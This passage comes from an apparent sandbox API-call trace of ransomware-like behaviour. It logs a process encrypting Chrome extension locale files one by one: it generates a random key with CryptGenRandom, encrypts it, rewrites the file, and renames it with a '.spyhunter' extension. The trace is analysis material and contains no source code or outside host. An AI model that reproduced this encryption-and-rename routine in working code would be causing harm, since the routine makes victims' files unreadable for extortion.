Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.spyhunter") returned 166 [0135.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0135.820] GetProcessHeap () returned 0x2c0000 [0135.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.820] GetProcessHeap () returned 0x2c0000 [0135.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.820] GetProcessHeap () returned 0x2c0000 [0135.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80990 | out: hHeap=0x2c0000) returned 1 [0135.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf350 | out: pbBuffer=0x25cf350) returned 1 [0135.822] GetProcessHeap () returned 0x2c0000 [0135.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf348*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf348*=0x30) returned 1 [0135.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0135.822] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.822] GetProcessHeap () returned 0x2c0000 [0135.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.822] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf30c*=0x161, lpOverlapped=0x0) returned 1 [0135.823] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffe9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.824] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x161, lpNumberOfBytesWritten=0x25cf30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf30c*=0x161, lpOverlapped=0x0) returned 1 [0135.824] GetProcessHeap () returned 0x2c0000 [0135.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.824] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.824] WriteFile (in: hFile=0x180, lpBuffer=0x25cf34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf30c, lpOverlapped=0x0 | out: lpBuffer=0x25cf34c*, lpNumberOfBytesWritten=0x25cf30c*=0x4, lpOverlapped=0x0) returned 1 [0135.824] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf30c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf30c*=0x30, lpOverlapped=0x0) returned 1 [0135.824] CloseHandle (hObject=0x180) returned 1 [0135.824] GetProcessHeap () returned 0x2c0000 [0135.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.824] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.spyhunter") returned 166 [0135.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0135.825] GetProcessHeap () returned 0x2c0000 [0135.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.825] GetProcessHeap () returned 0x2c0000 [0135.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.826] GetProcessHeap () returned 0x2c0000 [0135.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0135.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf348 | out: pbBuffer=0x25cf348) returned 1 [0135.827] GetProcessHeap () returned 0x2c0000 [0135.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf340*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf340*=0x30) returned 1 [0135.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.828] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0135.828] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.828] GetProcessHeap () returned 0x2c0000 [0135.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.828] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf304, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf304*=0x10e, lpOverlapped=0x0) returned 1 [0135.829] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.829] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x25cf304, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf304*=0x10e, lpOverlapped=0x0) returned 1 [0135.830] GetProcessHeap () returned 0x2c0000 [0135.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.830] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.830] WriteFile (in: hFile=0x180, lpBuffer=0x25cf344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf304, lpOverlapped=0x0 | out: lpBuffer=0x25cf344*, lpNumberOfBytesWritten=0x25cf304*=0x4, lpOverlapped=0x0) returned 1 [0135.830] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf304, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf304*=0x30, lpOverlapped=0x0) returned 1 [0135.830] CloseHandle (hObject=0x180) returned 1 [0135.830] GetProcessHeap () returned 0x2c0000 [0135.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.831] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.spyhunter") returned 166 [0135.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0135.832] GetProcessHeap () returned 0x2c0000 [0135.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.832] GetProcessHeap () returned 0x2c0000 [0135.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.832] GetProcessHeap () returned 0x2c0000 [0135.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80370 | out: hHeap=0x2c0000) returned 1 [0135.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf340 | out: pbBuffer=0x25cf340) returned 1 [0135.833] GetProcessHeap () returned 0x2c0000 [0135.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf338*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf338*=0x30) returned 1 [0135.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0135.834] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.834] GetProcessHeap () returned 0x2c0000 [0135.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.834] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf2fc*=0x164, lpOverlapped=0x0) returned 1 [0135.835] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffe9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.835] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x25cf2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf2fc*=0x164, lpOverlapped=0x0) returned 1 [0135.836] GetProcessHeap () returned 0x2c0000 [0135.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.836] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.836] WriteFile (in: hFile=0x180, lpBuffer=0x25cf33c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf33c*, lpNumberOfBytesWritten=0x25cf2fc*=0x4, lpOverlapped=0x0) returned 1 [0135.836] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2fc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2fc*=0x30, lpOverlapped=0x0) returned 1 [0135.836] CloseHandle (hObject=0x180) returned 1 [0135.836] GetProcessHeap () returned 0x2c0000 [0135.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.836] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.spyhunter") returned 166 [0135.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0135.837] GetProcessHeap () returned 0x2c0000 [0135.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.837] GetProcessHeap () returned 0x2c0000 [0135.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.837] GetProcessHeap () returned 0x2c0000 [0135.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fed8 | out: hHeap=0x2c0000) returned 1 [0135.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf338 | out: pbBuffer=0x25cf338) returned 1 [0135.838] GetProcessHeap () returned 0x2c0000 [0135.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf330*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf330*=0x30) returned 1 [0135.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0135.839] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.839] GetProcessHeap () returned 0x2c0000 [0135.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.839] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf2f4*=0xfd, lpOverlapped=0x0) returned 1 [0135.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.840] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x25cf2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf2f4*=0xfd, lpOverlapped=0x0) returned 1 [0135.840] GetProcessHeap () returned 0x2c0000 [0135.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.840] WriteFile (in: hFile=0x180, lpBuffer=0x25cf334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2f4, lpOverlapped=0x0 | out: lpBuffer=0x25cf334*, lpNumberOfBytesWritten=0x25cf2f4*=0x4, lpOverlapped=0x0) returned 1 [0135.840] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2f4*=0x30, lpOverlapped=0x0) returned 1 [0135.841] CloseHandle (hObject=0x180) returned 1 [0135.841] GetProcessHeap () returned 0x2c0000 [0135.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.841] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.spyhunter") returned 166 [0135.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0135.842] GetProcessHeap () returned 0x2c0000 [0135.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.842] GetProcessHeap () returned 0x2c0000 [0135.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.842] GetProcessHeap () returned 0x2c0000 [0135.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f730 | out: hHeap=0x2c0000) returned 1 [0135.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf330 | out: pbBuffer=0x25cf330) returned 1 [0135.843] GetProcessHeap () returned 0x2c0000 [0135.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.844] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf328*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf328*=0x30) returned 1 [0135.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0135.844] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.844] GetProcessHeap () returned 0x2c0000 [0135.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.844] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf2ec*=0x10c, lpOverlapped=0x0) returned 1 [0135.847] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.847] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x25cf2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf2ec*=0x10c, lpOverlapped=0x0) returned 1 [0135.848] GetProcessHeap () returned 0x2c0000 [0135.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.848] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.849] WriteFile (in: hFile=0x180, lpBuffer=0x25cf32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf32c*, lpNumberOfBytesWritten=0x25cf2ec*=0x4, lpOverlapped=0x0) returned 1 [0135.849] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2ec*=0x30, lpOverlapped=0x0) returned 1 [0135.849] CloseHandle (hObject=0x180) returned 1 [0135.849] GetProcessHeap () returned 0x2c0000 [0135.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.849] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.spyhunter") returned 166 [0135.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0135.850] GetProcessHeap () returned 0x2c0000 [0135.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.850] GetProcessHeap () returned 0x2c0000 [0135.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.850] GetProcessHeap () returned 0x2c0000 [0135.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f8b8 | out: hHeap=0x2c0000) returned 1 [0135.856] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf328 | out: pbBuffer=0x25cf328) returned 1 